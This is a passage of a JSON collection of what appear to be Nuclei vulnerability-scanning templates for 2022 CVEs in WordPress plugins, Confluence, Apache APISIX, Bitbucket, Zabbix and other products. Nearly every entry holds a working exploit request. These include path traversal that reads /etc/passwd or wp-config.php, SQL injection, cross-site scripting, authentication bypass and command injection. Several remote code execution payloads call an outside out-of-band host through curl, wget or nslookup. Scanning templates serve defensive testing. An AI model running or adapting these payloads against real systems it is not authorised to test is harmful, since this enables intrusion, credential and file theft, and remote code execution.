{{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","contains(header, \"text/html\")","status_code == 200","contains(body, '{\\\"CardNo\\\":false')"],"condition":"and"}]}]},{"id":"CVE-2022-0656","info":{"name":"uDraw <3.3.3 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\naction=udraw_convert_url_to_base64&url=/etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["cm9vd","data:image\\/;base64"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23134","info":{"name":"Zabbix Setup Configuration Authentication Bypass","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/zabbix/setup.php","{{BaseURL}}/setup.php"],"stop-at-first-match":true,"headers":{"Cookie":"zbx_session=eyJzZXNzaW9uaWQiOiJJTlZBTElEIiwiY2hlY2tfZmllbGRzX3Jlc3VsdCI6dHJ1ZSwic3RlcCI6Niwic2VydmVyQ2hlY2tSZXN1bHQiOnRydWUsInNlcnZlckNoZWNrVGltZSI6MTY0NTEyMzcwNCwic2lnbiI6IklOVkFMSUQifQ%3D%3D"},"matchers-condition":"and","matchers":[{"type":"word","words":["Database","host","port","Zabbix"],"condition":"and"},{"type":"word","words":["youtube_main","support.google.com"],"part":"header","condition":"and","negative":true},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24264","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nsearch_word=')+union+all+select+1,md5('{{num}}'),3,4,5,6,7,8--+-&order_by=id&order_orientation=ASC&path=component%2Ftable_manager%2Fview%2Fcu_countries&uniqueClass=wrapper_content_518284\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{md5(num)}}","td_available_languages"],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0533","info":{"name":"Ditty (formerly Ditty News Ticker) < 3.0.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=ditty&page=ditty_settings&tab=%22%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains_all(body_2, \"<img src onerror=alert(document.domain)>\", \"ditty\")"],"condition":"and"}]}]},{"id":"CVE-2022-24900","info":{"name":"Piano LED Visualizer 1.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/change_setting?second_value=no_reload&disable_sequence=true&value=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0787","info":{"name":"Limit Login Attempts (Spam Protection) < 5.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=WPLFLA_get_log_data&order[][column]=0&columns[][data]=(SELECT+7382+FROM+(SELECT(SLEEP(6)))ameU)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body, 'iTotalDisplayRecords')"],"condition":"and"}]}]},{"id":"CVE-2022-32028","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /admin/manage_user.php?id=-1%20union%20select%201,md5({{num}}),3,4,5--+ HTTP/1.1\nHost: {{Hostname}}\n"],"skip-variables-check":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4447","info":{"name":"WordPress Fontsy <=1.8.6 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=get_tag_fonts HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=-5219 UNION ALL SELECT NULL,NULL,NULL,md5({{num}}),NULL--\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"{{md5(num)}}\")"],"condition":"and"}]}]},{"id":"CVE-2022-0786","info":{"name":"WordPress KiviCare <2.3.9 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B\"id\":\"1\"%7D&props_doctor_id=1,2)+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Doctor details\")"],"condition":"and"}]}]},{"id":"CVE-2022-34267","info":{"name":"RWS WorldServer - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /ws-api/v2/users/me/details?token=02 HTTP/2\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"fullName\":\"System\""]},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24112","info":{"name":"Apache APISIX - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /apisix/batch-requests HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\n\n{\n  \"headers\":{\n    \"X-Real-IP\":\"127.0.0.1\",\n    \"Content-Type\":\"application/json\"\n  },\n  \"timeout\":1500,\n  \"pipeline\":[\n    {\n      \"method\":\"PUT\",\n      \"path\":\"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1\",\n      \"body\":\"{\\r\\n \\\"name\\\": \\\"test\\\", \\\"method\\\": [\\\"GET\\\"],\\r\\n \\\"uri\\\": \\\"/api/{{randstr}}\\\",\\r\\n \\\"upstream\\\":{\\\"type\\\":\\\"roundrobin\\\",\\\"nodes\\\":{\\\"httpbin.org:80\\\":1}}\\r\\n,\\r\\n\\\"filter_func\\\": \\\"function(vars) os.execute('curl {{interactsh-url}}/`whoami`'); return true end\\\"}\"\n    }\n  ]\n}\n","GET /api/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["\"reason\":\"OK\"","\"status\":200"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["GET \\/([a-z-]+) HTTP"],"part":"interactsh_request"}]}]},{"id":"CVE-2022-26134","info":{"name":"Confluence - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/","{{BaseURL}}/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20{{interactsh-url}}%22%29%7D/"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["contains(to_lower(header_1), \"x-cmd-response:\")"]},{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(to_lower(response_2), \"confluence\")"],"condition":"and"}],"extractors":[{"type":"kval","kval":["x_cmd_response"],"part":"header"}]}]},{"id":"CVE-2022-37153","info":{"name":"Artica Proxy 4.30.000000 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /fw.login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuserfont=&artica-language=&StandardDropDown=&HTMLTITLE=&username=admin&password=admin%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Password\" value=\"admin\"><script>alert(document.domain)</script>","Artica Web"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0422","info":{"name":"WordPress White Label CMS <2.2.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php?wlcms-action=preview HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nwlcms%5B_login_custom_js%5D=alert%28%2FXSS%2F%29%3B\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["alert(/XSS/);"]},{"type":"word","part":"body","words":["wlcms-login-wrapper"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0870","info":{"name":"Gogs <0.12.5 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n","GET /repo/migrate HTTP/1.1\nHost: {{Hostname}}\n","POST /repo/migrate HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&clone_addr=https%3A%2F%2F{{interactsh-url}}&auth_username=&auth_password=&uid=1&repo_name={{randstr}}&description=test\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns","http"]},{"type":"word","part":"body_1","words":["content=\"Gogs"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"auth_csrf","group":1,"regex":["name=\"_csrf\" content=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-40843","info":{"name":"Tenda AC1200 V-W15Ev2 - Authentication Bypass","severity":"medium"},"requests":[{"raw":["GET /goform/downloadSyslog/syslog.log HTTP/1.1\nHost: {{Hostname}}\nCookie: W15Ev2_user=\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["^0\\d{3}$"]},{"type":"word","part":"body","words":["[system]","[error]","[wan1]"],"condition":"or"},{"type":"word","part":"header","words":["Content-type: config/conf"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38794","info":{"name":"Zaver - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1170","info":{"name":"JobMonster < 4.5.2.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/resumes/?s=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","noo-resume"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4140","info":{"name":"WordPress Welcart e-Commerce <2.8.5 - Arbitrary File Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/etc/passwd","{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/Windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0760","info":{"name":"WordPress Simple Link Directory <7.7.2 - SQL injection","severity":"critical"},"requests":[{"raw":["@timeout 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=qcopd_upvote_action&post_id=(SELECT 3 FROM (SELECT SLEEP(7))enz)\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 200 || status_code == 500","contains(content_type, \"text/html\")","contains(body, \"vote_status\") || contains(body, \"critical error\")"],"condition":"and"}]}]},{"id":"CVE-2022-40881","info":{"name":"SolarView 6.00 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /network_test.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nhost=%0a{{cmd}}%0a&command=ping\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2863","info":{"name":"WordPress WPvivid Backup <0.9.76 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=WPvivid HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin-ajax.php?_wpnonce={{nonce}}&action=wpvivid_download_export_backup&file_name=../../../../../../../etc/passwd&file_size=922 HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/wp-admin/admin.php?page=WPvivid\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["\"_ajax_nonce\":\"([0-9a-z]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-29006","info":{"name":"Directory Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=admin' or '1'='1&password=1&login=login\n","GET /admin/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DMS || Dashboard","DMS Admin","Admin Profile"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42233","info":{"name":"Tenda 11N - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /index.asp HTTP/1.1\nHost: {{Hostname}}\nCookie: admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["def_wirelesspassword","Tenda 11N"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["GoAhead-Webs"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0678","info":{"name":"Microweber <1.2.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/demo/api/logout?redirect_to=/asdf%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>","content=\"Microweber\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-40022","info":{"name":"Symmetricom SyncServer Unauthenticated - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /controller/ping.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}/controller/ping.php\n\ncurrentTab=ping&refreshMode=&ethDirty=false&snmpCfgDirty=false&snmpTrapDirty=false&pingDirty=false&hostname=%60id%60&port=eth0&pingType=ping\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+)"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2022-47075","info":{"name":"Smart Office Web 20.28 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ExportReportingManager.aspx"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"application/CSV\")","contains(body, \"EmployeeName\") && contains(body, \"EmployeeCode\")"],"condition":"and"}]}]},{"id":"CVE-2022-1595","info":{"name":"WordPress HC Custom WP-Admin URL <=1.4 - Admin Login URL Disclosure","severity":"medium"},"requests":[{"raw":["HEAD /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nCookie: valid_login_slug=1\n"],"matchers":[{"type":"dsl","dsl":["status_code == 302","contains(header, 'wordpress_')","contains(header, 'Location')"],"condition":"and"}]}]},{"id":"CVE-2022-33119","info":{"name":"NUUO NVRsolo Video Recorder 03.06.02 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: \"><script>alert(document.domain)</script><\"\n\nlanguage=en&user=user&pass=pass&submit=Login\n"],"matchers":[{"type":"dsl","dsl":["contains(header, \"text/html\")","status_code == 200","contains(body,'<script>alert(document.domain)</script><\\\"?cmd=')"],"condition":"and"}]}]},{"id":"CVE-2022-1329","info":{"name":"Elementor Website Builder - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/ HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=336b29d7aee0463d8b651303eab505ea\n\n--336b29d7aee0463d8b651303eab505ea\nContent-Disposition: form-data; name=\"action\"\n\nelementor_upload_and_install_pro\n--336b29d7aee0463d8b651303eab505ea\nContent-Disposition: form-data; name=\"_nonce\"\n\n{{nonce}}\n--336b29d7aee0463d8b651303eab505ea\nContent-Disposition: form-data; name=\"fileToUpload\"; filename=\"{{randstr}}.zip\"\n\n{{base64_decode(\"UEsDBBQAAAAAAPEiZ1YAAAAAAAAAAAAAAAAOACAAZWxlbWVudG9yLXByby9VVA0AB8csB2TILAdkxywHZHV4CwABBOgDAAAE6AMAAFBLAwQUAAgACAB8KGdWAAAAAAAAAAA6BAAAHwAgAGVsZW1lbnRvci1wcm8vZWxlbWVudG9yLXByby5waHBVVA0ABzw2B2Q9NgdkPDYHZHV4CwABBOgDAAAE6AMAAKVSXU/bQBB8rn/FgqryoXyUoFZqKAUTnBCJhshxQKiq0Nlex6ee705354T8++45AfLQ9qVv9u3s7OzMfr3QpQ66x8cBHMNU1AsuYcIq7EMksELplIGpUb56jTYzXDuuZB+SEncQD5ha7hCuai5yNFAyC9wBE6IPuWELYDKnD6VBswVCuoG1QPNnFKDRFJg5yNHyhWxBpVIuEAxaraTlSwTMueNy0Wp4KmWwAyN0YB0zDnOQarW3o38ej/tQOqdtv9vFF5GdTFXdi9pVT1bVJsPzlW7rpsF+8K8ZqzSj+eebx3ZtePNe0fC68uic2dKPCWtXKrPjkKf2hXs0tnHntPO5c/IG/V9FrGH5uyI/KcFnB9eqYpzmv47YFi81y35556OdAlxmzOFCmTUMyNIt9C1UbqEwiGBV4VbM0EmsVQ0Zk5RMzq0zPK0pc5+zzLvUUKmcF2tPQm+19Ifg6EwcmsqCKpqf0WRO0Uk0TMC0TgXP4JZnKC0C3Yz2L7akSNOGx3cMvYbZVgMMFREzf4MtQE51A8uN63D6MmNL2ILNmkyuQdCmr8jOn1Z92ygHuiHPUypN6kvm/D4rLgSkCLXFohYt309geBgnN3fzBMLJIzyEcRxOksczAlNgVMUlbqh4pQUnZtrBMOnWJNUzfI/iwQ21hFfj23HySIJhOE4m0WwGw7sYQpiGcTIezG/DGKbzeHo3izowQ6/K5/UvN4smEHIsR8e4sH7pbhAEvIDDPW4tusP3T6Mo+XHAMseX5M/Bz6Oj4J1BVxt5FgSYlQqq/NPh/uA+avc+9nrtk9Pel/0jqgUX34LfUEsHCH5L6n9mAgAAOgQAAFBLAQIUAxQAAAAAAPEiZ1YAAAAAAAAAAAAAAAAOACAAAAAAAAAAAAD9QQAAAABlbGVtZW50b3ItcHJvL1VUDQAHxywHZMgsB2THLAdkdXgLAAEE6AMAAAToAwAAUEsBAhQDFAAIAAgAfChnVn5L6n9mAgAAOgQAAB8AIAAAAAAAAAAAALSBTAAAAGVsZW1lbnRvci1wcm8vZWxlbWVudG9yLXByby5waHBVVA0ABzw2B2Q9NgdkPDYHZHV4CwABBOgDAAAE6AMAAFBLBQYAAAAAAgACAMkAAAAfAwAAAAA=\")}}\n--336b29d7aee0463d8b651303eab505ea--\n","GET /index.php?activate=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_4","words":["5f9bc5edd71c78284dabe630df8cd71d"]}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["admin-ajax.php\",\"nonce\":\"([0-9a-zA-Z]+)\"}"],"internal":true}]}]},{"id":"CVE-2022-1391","info":{"name":"WordPress Cab fare calculator < 1.0.4 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34328","info":{"name":"PMB 7.3.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?lvl=author_see&id=42691%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>' target='cart_info"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1119","info":{"name":"WordPress Simple File List <3.2.8 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0653","info":{"name":"Wordpress Profile Builder Plugin Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href=\"javascript:alert(document.domain);\">here</a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28117","info":{"name":"Navigate CMS 2.9.4 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /navigate/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /navigate/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------123456789012345678901234567890\n\n-----------------------------123456789012345678901234567890\nContent-Disposition: form-data; name=\"login-username\"\n\n{{username}}\n-----------------------------123456789012345678901234567890\nContent-Disposition: form-data; name=\"csrf_token\"\n\n{{csrf_token}}\n-----------------------------123456789012345678901234567890\nContent-Disposition: form-data; name=\"login-password\"\n\n{{password}}\n-----------------------------123456789012345678901234567890\n","POST /navigate/navigate.php?fid=dashboard&act=json&oper=feed HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nlimit=5&language=en&url=file:///etc/passwd\n","GET /navigate/private/1/cache/0f1726ba83325848d47e216b29d5ab99.feed HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["csrf_token\" value=\"([a-f0-9]{64})"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-36804","info":{"name":"Atlassian Bitbucket - Remote Command Injection","severity":"high"},"requests":[{"raw":["GET /rest/api/latest/repos HTTP/1.1\nHost: {{Hostname}}\n","GET /rest/api/latest/projects/{{key}}/repos/{{slug}}/archive?filename={{data}}&at={{data}}&path={{data}}&prefix=ax%00--exec=%60id%60%00--remote=origin HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"iterate-all":true,"matchers-condition":"and","matchers":[{"type":"word","words":["com.atlassian.bitbucket.scm.CommandFailedException"]},{"type":"status","status":[500]}],"extractors":[{"type":"json","name":"key","internal":true,"json":[".[\"values\"] | .[] | .[\"project\"] | .key"],"part":"body"},{"type":"json","name":"slug","internal":true,"json":[".[\"values\"] | .[]  | .slug"],"part":"body"},{"type":"regex","group":1,"regex":["uid=.*\\(([a-z]+)\\):"]}]}]},{"id":"CVE-2022-0201","info":{"name":"WordPress Permalink Manager <2.2.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?p=%3Cimg%20src%20onerror=alert(/XSS/)%3E&debug_url=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(/XSS/)>","pm_query"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2022-3484","info":{"name":"WordPress WPB Show Core - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?audioPlayerOption=1&fileList[0][title]=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"wpb_jplayer_setting\")","contains(body, \"<script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2022-34093","info":{"name":"Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/i3geo/pacotes/linkedinoauth/example/access_token.php?=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"%3Cscript%3Ealert(document.domain)%3C/script%3E\", \"Invalid consumer key\")"],"condition":"and"}]}]},{"id":"CVE-2022-29078","info":{"name":"Node.js Embedded JavaScript 3.1.6 - Template Injection","severity":"critical"},"requests":[{"raw":["GET /page?id={{randstr}}&settings[view%20options][outputFunctionName]=x;process.mainModule.require(%27child_process%27).execSync(%27wget+http://{{interactsh-url}}%27);s HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["You are viewing page number"]}]}]},{"id":"CVE-2022-24716","info":{"name":"Icinga Web 2 - Arbitrary File Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/lib/icinga/icinga-php-thirdparty/etc/passwd","{{BaseURL}}/icinga2/lib/icinga/icinga-php-thirdparty/etc/passwd","{{BaseURL}}/icinga-web/lib/icinga/icinga-php-thirdparty/etc/passwd"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/plain"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0148","info":{"name":"WordPress All-in-one Floating Contact Form <2.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=my-sticky-elements-leads&search-contact=xxxx%22%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29+x HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(`document.domain`) x\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0288","info":{"name":"WordPress Ad Inserter <2.7.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}"],"body":"html_element_selection=</script><img+src+onerror=alert(document.domain)>\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><img src onerror=alert(document.domain)>","ad-inserter"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28079","info":{"name":"College Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/asign-single-student-subjects.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsubmit=Press&roll_no=3&course_code=sd' UNION ALL SELECT 